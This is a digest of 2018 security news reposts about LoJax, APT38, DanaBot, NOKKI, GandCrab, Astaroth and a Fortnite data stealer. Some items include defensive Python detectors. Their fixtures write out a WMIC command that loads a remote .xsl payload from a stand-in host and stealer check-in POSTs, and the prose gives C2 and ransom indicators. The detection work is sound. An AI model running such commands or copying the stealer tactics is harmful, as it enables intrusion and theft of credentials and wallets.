How to Defend Against LoJax Malware and UEFI Rootkits

According to ESET, organizations can defend themselves against LoJax malware and UEFI rootkits by enabling Secure Boot. The researchers also urged security teams to use the latest UEFI/BIOS available for their motherboard. Updating UEFI/BIOS can result in performance degradation, so security professionals should consult their application vendors to determine the potential impact to their environments.

Sources: ESET, McAfee, YouTube

The post Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware appeared first on Security Intelligence.

Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?

The Canadian restaurant chain Recipe Unlimited that operates over 20 restaurant brands has suffered a major IT outage over the weekend in a “malware outbreak.”

The company operates nearly 1,400 restaurants under 19 different brands in Canada.

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company confirmed that malware is the root cause of a partial network outage at nine of its franchises, including Swiss Chalet, Harvey’s, East Side Mario’s, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started the incident response procedure. A number of systems have been taken offline, and all the locations infected by the ransomware were isolated from the Internet.

The affected locations continued to process card transactions manually.

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, Kelseys, Montana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to CBC News, Recipe was the victim of a ransomware attack; the outlet also shared a copy of a ransom note that was provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me‘ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using “the strongest military algorithms”; at the time of writing there is no information on the amount of bitcoin demanded from the victims.

The amount requested by the crooks increases over time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited denies it was the victim of a ransomware attack, noting that it conducts regular system backups to promptly mitigate such attacks.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.


According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with Ryuk ransomware, a threat discovered by security experts at Check Point in August. At the time, the ransomware campaign was aimed at organizations around the world and was attributed to a North Korea-linked threat actor.

The campaign appears targeted and well planned: the crooks hit several enterprises and encrypted hundreds of PCs, storage systems and data centers in each infected company.

Pierluigi Paganini

(Security Affairs – Recipe, ransomware)

The post Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack? appeared first on Security Affairs.

Fortnite players beware: New data stealing malware disguised as cheat tool

By Waqas

Popular video game Fortnite’s new season is here and so begins the season of malware scamming for cybercriminals. Unsurprisingly, Malwarebytes Labs has reported that scammers are trying their best to come up with a fake version of the game to con the users. However, their current attempts cannot be termed as a mere con attack […]

This is a post from HackRead.com Read the original post: Fortnite players beware: New data stealing malware disguised as cheat tool

Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018, including our Global Awards Winners for 2018, packed with over 75 pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro

InfoSec Knowledge is Power. We have 6 years of eMagazines online with timeless content. Visit our online library by clicking here. Please tell your friends to subscribe – no strings, always free emagazines.

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4. GLOBAL 2018 Awards have arrived – Winners are listed here: https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1. USA 2019 Awards – OPENING SOON!

Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.


APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets, relying on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

NotPetya Horror Story Highlights Need for Holistic Security

The NotPetya malware’s ability to cripple even sophisticated, global firms is a cautionary tale about the need for businesses to understand their risk and take a holistic view of security says Fadi Albatal, Chief Strategy Officer at Hitachi Systems Security.* If you’re keen on information security and happen to enjoy horror stories, point...


Network Outage at Some Recipe Unlimited Locations Caused by Malware

A malware outbreak was responsible for a network outage that affected a limited number of Recipe Unlimited restaurant locations. On 1 October, Recipe Unlimited announced a malware attack of which it learned at the end of September. The Canadian restaurant chain owner and food distributor said in a statement that it responded by taking certain […]

The post Network Outage at Some Recipe Unlimited Locations Caused by Malware appeared first on The State of Security.

New Danabot Banking Malware campaign now targets banks in the U.S.

According to malware researchers from Proofpoint, DanaBot attackers launched a new campaign aimed at banks in the United States.

A couple of weeks ago, security experts at ESET observed a surge in the activity of the DanaBot banking Trojan, which was targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

DanaBot is a multi-stage modular banking Trojan written in Delphi; the malware allows operators to add new functionality by installing plug-ins.

When it was analyzed by Proofpoint, its experts speculated that the threat was under active development.

The banking Trojan initially targeted users in Australia and Poland, then expanded to other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

According to Proofpoint, DanaBot attackers have now launched a new campaign aimed at banks in the United States as well. Experts monitored different campaigns using a different ID found in server communications, which suggests DanaBot is being offered under the malware-as-a-service model.

Proofpoint has identified 9 different actors, each distributing the Trojan to a specific region; the experts highlighted that only Australia was targeted by two different groups of attackers.

“Based on distribution methods and targeting, we have been grouping DanaBot activity using an “affiliate ID” that we have observed in various parts of the C&C protocol (e.g., offset 0xc of the 183-byte binary protocol header).” reads the report published by Proofpoint.

The campaign against North America uses spam messages that pretend to be digital faxes from eFax received by the recipients.


When the recipient clicks on the download button included in the content of the message, it will download a weaponized Word document that poses as an eFax.

If the recipient enables the macros to properly view the fax, the malicious code executes the embedded Hancitor malware, which downloads two versions of the Pony stealer and the DanaBot banking malware.

“The emails used an eFax lure (Figure 1) and contained a URL linking to the download of a document containing malicious macros (Figure 2). The macros, if enabled by the user, executed the embedded Hancitor malware [3], which, in turn, received tasks to download two versions of Pony stealer and the DanaBot banking malware.” continues the analysis.

Experts from Proofpoint highlighted that each affiliate ID uses different distribution methods: some actors leverage the Fallout Exploit Kit, others web injects or malspam campaigns. Researchers also found similarities between DanaBot and the CryptXXX ransomware, which used a custom command-and-control protocol on TCP port 443.

Proofpoint speculates DanaBot’s C&C traffic is an evolution of this protocol that uses AES encryption in addition to the Zlib compression.

The researchers believe that the developers created DanaBot as part of an evolution of CryptXXX.

“Thus it would seem that Danabot follows in a long line of malware from one particular group. This family began with ransomware, to which stealer functionality was added in Reveton.” concludes Proofpoint.

“The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot.”
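As an added example (not Proofpoint's code), the Python below reads the affiliate ID from a constructed 183-byte header at the offset the report names and groups sessions by affiliate and region the way the researchers describe; the 4-byte little-endian field width, the session tuples and the affiliate numbers are assumptions of this example.

```python
"""Affiliate-ID extraction from DanaBot's C&C protocol header, following the
detail Proofpoint reports (183-byte binary header, affiliate ID at offset 0xc).
Added example; not Proofpoint's code."""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

HEADER_LEN = 183           # header length reported by Proofpoint
AFFILIATE_OFFSET = 0x0C    # offset reported by Proofpoint
AFFILIATE_WIDTH = 4        # ASSUMPTION of this example: 4-byte little-endian field


def affiliate_id(header: bytes) -> int:
    """Read the affiliate ID; refuse anything shorter than a full header."""
    if len(header) < HEADER_LEN:
        raise ValueError(f"expected {HEADER_LEN}-byte header, got {len(header)}")
    field = header[AFFILIATE_OFFSET:AFFILIATE_OFFSET + AFFILIATE_WIDTH]
    return int.from_bytes(field, "little")


def constructed_header(aff: int) -> bytes:
    """Build a test header: zero filler with only the affiliate field populated."""
    buf = bytearray(HEADER_LEN)
    buf[AFFILIATE_OFFSET:AFFILIATE_OFFSET + AFFILIATE_WIDTH] = aff.to_bytes(AFFILIATE_WIDTH, "little")
    return bytes(buf)


def cluster_by_affiliate(sessions: List[Tuple[str, bytes]]) -> Dict[int, Set[str]]:
    """Map affiliate ID -> set of targeted regions, the grouping Proofpoint describes."""
    groups: Dict[int, Set[str]] = defaultdict(set)
    for region, header in sessions:
        groups[affiliate_id(header)].add(region)
    return dict(groups)


def regions_with_multiple_affiliates(groups: Dict[int, Set[str]]) -> Set[str]:
    """Regions served by more than one affiliate (Proofpoint saw only Australia)."""
    per_region: Dict[str, Set[int]] = defaultdict(set)
    for aff, regions in groups.items():
        for region in regions:
            per_region[region].add(aff)
    return {r for r, affs in per_region.items() if len(affs) > 1}


# Constructed sessions: (targeted region, captured header); affiliate numbers are made up.
SESSIONS = [
    ("AU", constructed_header(3)),
    ("AU", constructed_header(7)),
    ("PL", constructed_header(5)),
    ("US", constructed_header(9)),
    ("US", constructed_header(9)),
]

if __name__ == "__main__":
    groups = cluster_by_affiliate(SESSIONS)
    for aff, regions in sorted(groups.items()):
        print(f"affiliate {aff}: {sorted(regions)}")
    print("regions with several affiliates:", regions_with_multiple_affiliates(groups))
```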

Pierluigi Paganini

(Security Affairs – DanaBot, hacking)

The post New Danabot Banking Malware campaign now targets banks in the U.S. appeared first on Security Affairs.

Researchers associated the recently discovered NOKKI Malware to North Korean APT

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to North Korea-Linked APT.

Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI, that has been attributed to North Korea-linked attackers.

NOKKI borrows code from the KONNI malware; the latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically motivated victims in Eurasia and Southeast Asia.

KONNI went undetected for more than 3 years; it was able to avoid detection thanks to continuous evolution, with recent versions capable of executing arbitrary code on target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, and experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data from infected systems (IP address, hostname, username, drive information, operating system information, installed programs); it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to %LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters, and targets in Russia with documents written in Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware; they employed a deobfuscation technique that was also used in DOGCALL-carrying documents targeting individuals interested in the World Cup hosted in Russia in 2018.

“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file uses the same deobfuscation routine; it fetches and executes a dropper tracked as Final1stspy, which in turn downloads a strain of the DOGCALL malware.

DOGCALL implements backdoor features: it can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

The malware connects to its command and control (C&C) infrastructure via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI led us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” 

Pierluigi Paganini

(Security Affairs – NOKKI malware, North Korea)

The post Researchers associated the recently discovered NOKKI Malware to North Korean APT appeared first on Security Affairs.

Z-LAB Report – Analyzing the GandCrab v5 ransomware

Experts at the Cybaze Z-Lab have analyzed the latest iteration of the infamous GandCrab ransomware, version 5.0.

Malware researchers at Cybaze ZLab analyzed the latest version of the infamous GandCrab ransomware, version 5.0. Most of the infections have been observed in central Europe, but experts found evidence that the malicious code doesn’t infect Russian users. GandCrab operates like a classic ransomware: it encrypts all user files and drops some ransom notes on the infected machine.

The ransomware appends a pseudo-random extension (5 characters long) that is different for each infection (some of the observed extensions are .txvpq, .rttmc and .mcbot).

The ransom note contains some information related to the infection: an ID (“fed0a66240f8743f”, in the image below), a “GANDCRAB KEY”, required to restore the original files, and some encrypted information about the infected system such as the username, the PC name, the domain, the operating system and the language.

GandCrab 5

Unlike GandCrab v4, this version is able to kill some processes associated with popular applications (such as Word, Excel and SQL Server) so that the files opened by these applications can be encrypted.

GandCrab 5

The payment process is implemented through the hidden service associated with the Tor address hxxp://gandcrabmfe6mnef[.]onion, which is the same used by previous versions of the malware.

Technical details, including IoCs and YARA rules, are reported in the analysis shared by researchers at the ZLab.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf

Pierluigi Paganini

(Security Affairs – ransomware, cybercrime)

The post Z-LAB Report – Analyzing the GandCrab v5 ransomware appeared first on Security Affairs.

DanaBot Observed in Large Campaign Targeting U.S. Organizations

Researchers observed the distribution of the DanaBot banking trojan in a large attack campaign targeting U.S. organizations. On 26 September, Proofpoint detected a campaign consisting of hundreds of thousands of emails intended for U.S. recipients. Each of these attack messages masqueraded as an eFax and used a “Download Fax” link to download a document containing […]

The post DanaBot Observed in Large Campaign Targeting U.S. Organizations appeared first on The State of Security.

Crypto-Security Testnet Surpasses Key Milestones

Security combined with microcomputing has been a highly relevant combination, both economically and financially, since the early days of commercial internet technology, the John McAfee era of anti-virus software, and fears of ‘millennium-bug’ (‘Y2K’)-induced societal meltdowns. As a market player, ‘cybersecurity’ is hailed for its continued value and growth, with […]

The post Crypto-Security Testnet Surpasses Key Milestones appeared first on Hacked: Hacking Finance.

Episode 114: Complexity at Root of Facebook Breach and LoJax is a RAT You Can’t Kill

In this week’s podcast: Facebook revealed that a breach affected 50 million accounts and as many as 90 million users. Is complexity at the root of the social media giant’s troubles? We speak with Gary McGraw of the firm Synopsys about it. Also: BIOS-based malware has been demonstrated at security conferences for years. Last week, the...

Meet GhostDNS: The dangerous malware behind IoT botnet targeting banks

By Waqas

Security researchers at NetLab, a sub-division of the Chinese cybersecurity firm Qihoo 360, have discovered a new, wide-scale, and very active malware campaign that has managed to hijack more than 100,000 home routers between Sept 21 and 27. A majority of routers (almost 88%) are located in Brazil. The malware has been dubbed GhostDNS. Once […]

This is a post from HackRead.com. Read the original post: Meet GhostDNS: The dangerous malware behind IoT botnet targeting banks

Astaroth Trojan Malware Returns to Infect South American Users

A new wave of Astaroth Trojan malware has resurfaced in South America, with more than 8,000 machines attacked in just one week.

According to the Cofense Phishing Defense Center, the Trojan used fake invoice emails with .lnk attachments that appeared to come from legitimate services under cam.br domains. It specifically targeted South American businesses — any attacks that detected an IP address outside of this geographic area were aborted.

If South American targets clicked on the provided link, Astaroth — the “Great Duke of Hell” in ancient lore — leveraged the Windows Management Instrumentation Console (WMIC) and its connected command-line interface to download nonlocal payloads with .xsl extensions.

Because the WMIC was run in noninteractive mode, users were typically unaware of the compromise. The malware then prevented users from opening any web browser except Internet Explorer, and when users navigated to Brazilian banks or businesses, it began recording keystrokes for data collection and account compromise.

How Does Astaroth Avoid Detection?

Astaroth first emerged in 2017, but Cofense noted that the revived campaign “has been well planned and supported, exclusively targeting South Americans.”

Despite its limited radius, however, the Trojan malware presents real concerns for organizations. To evade detection, the malware uses a randomly selected domain from a list of 154 in-code options. All the domains were hosted on Cloudflare, making it difficult to immediately identify them as malicious. This also made it hard for companies to effectively block Astaroth payloads due to the sheer number of legitimate domains associated with Cloudflare.

Furthermore, given the utility of the WMIC in managing Windows hosts, it remains a popular tool for corporate administrators — making it the ideal vehicle for Astaroth. It also makes it difficult for companies to avoid infection, since the WMIC is often a key part of day-to-day operations.
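Because blocking WMIC outright is rarely an option, the practical control is to detect the one thing the Astaroth chain needs from it: a `/format:` switch pointing at a non-local .xsl stylesheet. The following added example is not Cofense's or IBM's code; the process-creation events and `.example` hosts are constructed for illustration.

```python
"""Detect WMIC loading a non-local .xsl stylesheet, the Astaroth delivery step
described above. Added example, not Cofense's or IBM's code; the events are
constructed, not captured from a real incident."""
import re
from urllib.parse import urlparse

# Constructed process-creation records (what a Sysmon Event ID 1 or EDR feed
# would hand to a detection pipeline). Hosts use reserved .example names.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://payload.example/upd/fax.xsl"'},
    {"id": 2, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic process list brief /format:list"},
    {"id": 3, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"C:\Users\ops\reports\inventory.xsl"'},
    {"id": 4, "image": r"C:\Windows\SysWOW64\wbem\wmic.exe",
     "cmdline": r"wmic /node:. os get /FORMAT:\\files.example\pub\style.xsl"},
    {"id": 5, "image": r"C:\Program Files\Tool\tool.exe",
     "cmdline": "tool.exe --template https://payload.example/x.xsl"},
]

# Value handed to WMIC's /format: switch: a built-in keyword, a local file,
# or a remote location. Quotes around the value are optional.
FORMAT_ARG = re.compile(r'/format\s*:\s*"?([^"\s]+)', re.IGNORECASE)


def remote_xsl_target(cmdline):
    """Return the non-local .xsl passed to /format:, or None if the switch is
    absent, names a built-in format, or points at a local file."""
    m = FORMAT_ARG.search(cmdline)
    if not m:
        return None
    target = m.group(1)
    lower = target.lower()
    if lower.startswith(("http://", "https://")):
        return target if urlparse(lower).path.endswith(".xsl") else None
    if lower.startswith("\\\\") and lower.endswith(".xsl"):  # UNC share path
        return target
    return None


def is_wmic(image):
    """True when the created process image is wmic.exe (any bitness)."""
    return image.lower().endswith("\\wmic.exe")


def scan_events(events):
    """Return (event id, target) for every WMIC run that loads a remote .xsl."""
    hits = []
    for ev in events:
        if not is_wmic(ev["image"]):
            continue
        target = remote_xsl_target(ev["cmdline"])
        if target:
            hits.append((ev["id"], target))
    return hits


if __name__ == "__main__":
    for event_id, target in scan_events(SAMPLE_EVENTS):
        print(f"event {event_id}: WMIC loaded remote stylesheet {target}")
```

Local stylesheets and the built-in format keywords pass untouched, so routine administrative use of WMIC does not trip the rule.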

How to Protect Your Organization From Trojan Malware

To avoid Astaroth, IBM X-Force Exchange recommends implementing a separate verification process for email attachments. This could take the form of texts, phone calls or other secure communications. If users can easily verify that unexpected emails were not sent by legitimate vendors or clients, they can delete them instead of potentially exposing systems to risk.

Security professionals also suggest using continuous backup solutions coupled with regular account monitoring to limit the impact of data-stealing Trojan malware and prevent keyloggers from stealing password and login data.

Source: Cofense Phishing Defense Center

The post Astaroth Trojan Malware Returns to Infect South American Users appeared first on Security Intelligence.

Fortnite gamers targeted by data theft malware

The new season of the incredibly popular video game Fortnite is upon us, and so too are the scams. It’s no surprise that con artists would jump on this bandwagon, eager to peddle their fakeouts.

Only this time, scammers had something a little more dangerous in mind than your typical low-level surveys and downloads that never actually materialize. Among all the gluttony of scams there hid a malicious file ready to steal data and Bitcoin, for starters.

How did we find it? First, we sifted through a sizable mish-mash of free season six passes, supposedly “free” Android versions of Fortnite, which were leaked out from under the developer’s noses, the ever-popular blast of “free V-Bucks” used to purchase additional content in the game, and a lot of bogus cheats, wallhacks, and aimbots.

Here’s the current state of YouTube, for example:

fortnite search results

These videos can drive huge numbers: Here’s one that’s been pulled down, but managed to rack up 120,000 views before the hammer fell:

120k views

Almost all of the scam tomfoolery followed the typical survey route, as expected. But buried in all of this was a nasty little slice of data theft malware disguised as a cheat tool.

Offering up a malicious file under the pretense of a cheat is as old school as it gets, but that’s never stopped cybercriminals before. In this scenario, would-be cheaters suffer a taste of their own medicine via a daisy chain of clickthroughs and (eventually) some malware as a parting gift. Shall we take a look?

Setting the scene

The YouTube account offering this scam up has a little over 700 subscribers, and the video in question already had more than 2,200 views the day after being uploaded.

fortnite aimbot video

Clicking the link sends potential victims to a page on Sub2Unlock. This site differs from typical survey pages, where you’d normally click offers or fill in questions to obtain a theoretical reward. Instead, it asks you to hit subscribe on the social portal of the person sending you there in the first place. So there’s one difference, right off the bat.

sub to unlock

Another interesting difference is that any initial survey page requires you to physically complete a survey before progressing. Without doing this, you can’t gain access to a download link.

Here, we had no validation taking place during our testing. Clicking the subscribe button simply opened up the YouTube channel’s subscribe page but nothing checked to ensure we’d actually subscribed. All we had to do at this point was go back to the Sub2Unlock site and click the download button.

From here, gamers are whisked away to a site located at bt-fortnite-cheats(dot)tk

fortnite cheat site

This site is a fairly good-looking portal claiming to offer up the desired cheat tools, and it stands a fair chance of convincing youngsters of its legitimacy. A little bit more button clicking, and potential victims are taken to a more general download site containing what appears to be an awful lot of files alongside a wide range of adverts.

fortnite malware download link

As far as the malicious file in question goes, at time of writing, 1,207 downloads had taken place. That’s 1,207 downloads too many.

File information

Malwarebytes detects this file as Trojan.Malpack, a generic detection given to files packed suspiciously. The actual payload could be anything at all, but it will invariably be up to no good. In this case, a little digging showed us the payload is a data stealer.

Once the initial .EXE (which weighs in at just 168KB) runs on the target system, it performs some basic enumeration of details specific to the infected computer. It then attempts to send data via a POST request to an /index.php file hosted in the Russian Federation, courtesy of the IP address 5(dot)101(dot)78(dot)169.

Some of the most notable things it takes an interest in are browser session information, cookies, Bitcoin wallets, and also Steam sessions.

a grab bag

Bizarrely, it also wrote this to our test system:

radio stations

…Grateful Dead, anyone?

The IP address up above has been seen many times in relation to similarly named/themed files.

Lots of the files contained in this download are packed in entirely different ways. One of them has a process called “Stealer.exe.” Many more post the stolen information to /gate.php instead of index.php, which is a common sign of Zbot and a few others.
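The exfiltration pattern described above (a POST straight to a numeric host, hitting /index.php or, for Zbot-style stealers, /gate.php) is easy to pick out of web proxy logs. The following added example is not Malwarebytes' code; the log lines are constructed and use documentation addresses rather than the IP quoted in the post.

```python
"""Flag stealer check-ins in web proxy logs: POST requests to a bare-IP host
whose path ends in /index.php or /gate.php, the exfiltration pattern described
above. Added example, not Malwarebytes' code; the log lines are constructed
and use RFC 5737/3849 documentation addresses, not the article's IP."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed proxy log: "timestamp client method url status".
SAMPLE_LOG = """\
2018-10-02T10:14:03Z 10.0.0.21 POST http://198.51.100.17/index.php 200
2018-10-02T10:14:09Z 10.0.0.21 GET http://198.51.100.17/index.php 200
2018-10-02T10:15:40Z 10.0.0.34 POST https://shop.example/index.php 200
2018-10-02T10:16:02Z 10.0.0.21 POST http://203.0.113.9/panel/gate.php 200
2018-10-02T10:17:55Z 10.0.0.50 POST http://[2001:db8::1]/gate.php 200
2018-10-02T10:18:10Z 10.0.0.50 POST http://198.51.100.17/api/v1/upload 200
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Path suffix -> what the post associates it with.
CHECKIN_PATHS = {
    "/index.php": "index.php check-in",
    "/gate.php": "Zbot-style gate.php",
}


def host_is_ip_literal(host):
    """True for hosts given as an IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(line):
    """Return (client, host, path, hint) for a suspicious POST, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    _ts, client, method, url, _status = m.groups()
    if method != "POST":
        return None
    parts = urlsplit(url)
    host = parts.hostname or ""
    # Named hosts posting to index.php are ordinary web apps; the stealer
    # and its relatives post straight to a numeric address.
    if not host_is_ip_literal(host):
        return None
    path = parts.path.lower()
    for suffix, hint in CHECKIN_PATHS.items():
        if path.endswith(suffix):
            return (client, host, parts.path, hint)
    return None


def scan_log(text):
    """Apply classify() to every line and keep the hits, in log order."""
    return [hit for hit in (classify(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for client, host, path, hint in scan_log(SAMPLE_LOG):
        print(f"{client} -> {host}{path} ({hint})")
```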

While this particular file probably isn’t that new, it’s still going to do a fair bit of damage to anyone who runs it. Combining it with the current fever for new Fortnite content is a recipe for stolen data and a lot of cleanup afterward.

As a final note, we should mention the readme file accompanying the stealer advertises being able to purchase additional Fortnite cheats for “$80 Bitcoin.”

read me

Given how things up above panned out, we’d advise anyone tempted to cheat to steer well clear of this one. Winning is great, but it’s absolutely not worth risking a huge slice of personal information to get the job done.

The post Fortnite gamers targeted by data theft malware appeared first on Malwarebytes Labs.

The ‘Gazorp’ Azorult Builder emerged from the Dark Web

Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.

